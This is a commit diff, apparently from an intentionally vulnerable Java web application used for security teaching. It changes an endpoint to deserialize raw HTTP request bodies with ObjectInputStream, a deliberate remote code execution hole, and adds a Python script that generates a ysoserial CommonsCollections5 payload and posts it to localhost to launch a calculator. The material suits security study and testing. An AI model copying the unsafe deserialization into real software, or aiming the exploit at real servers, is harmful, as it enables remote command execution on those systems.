update deserialize

Author: JoyChou93

README.md

@@ -63,12 +63,29 @@ Viarus
 
 ### 反序列化
 
-利用ysoserial构造POC
+打包ysoserial
 
 ``` 
 git clone https://github.com/frohoff/ysoserial.git
 mvn clean package -DskipTests
-java -jar /Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'open /Applications/Calculator.app' > /tmp/poc
 ```
 
-访问`http://localhost:8080/deserialize/test`即可弹窗
+执行exp
+
+```python
+#coding: utf-8
+#author: JoyChou
+#date:   2018.07.17
+
+import requests
+import subprocess
+
+def poc(url , gadget, command):
+	ys_filepath = '/Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar'
+	popen = subprocess.Popen(['java', '-jar', ys_filepath, gadget, command], stdout=subprocess.PIPE)
+	payload = popen.stdout.read()
+	r = requests.post(url, data=payload, timeout=5)
+
+if __name__ == '__main__':
+	poc('http://127.0.0.1:8080/deserialize/test', 'CommonsCollections5', 'open -a Calculator')
+```

src/main/java/org/joychou/controller/Deserialize.java

@@ -6,13 +6,13 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 import javax.servlet.http.HttpServletRequest;
-import java.io.FileInputStream;
+import java.io.InputStream;
 import java.io.ObjectInputStream;
 
 /**
  * @author: JoyChou
  * @Date:   2018年06月14日
- * @Desc：  该应用必须有Commons-Collections包才能利用反序列化。
+ * @Desc：  该应用必须有Commons-Collections包才能利用反序列化命令执行。
  */
 
 @Controller
@@ -23,13 +23,13 @@ public class Deserialize {
     @ResponseBody
     public static String deserialize_test(HttpServletRequest request) throws Exception{
         try {
-            ObjectInputStream in = new ObjectInputStream(new FileInputStream("/tmp/poc"));
+            InputStream iii = request.getInputStream();
+            ObjectInputStream in = new ObjectInputStream(iii);
             in.readObject();  // 触发漏洞
             in.close();
             return "test";
         }catch (Exception e){
             return "exception";
         }
-
     }
 }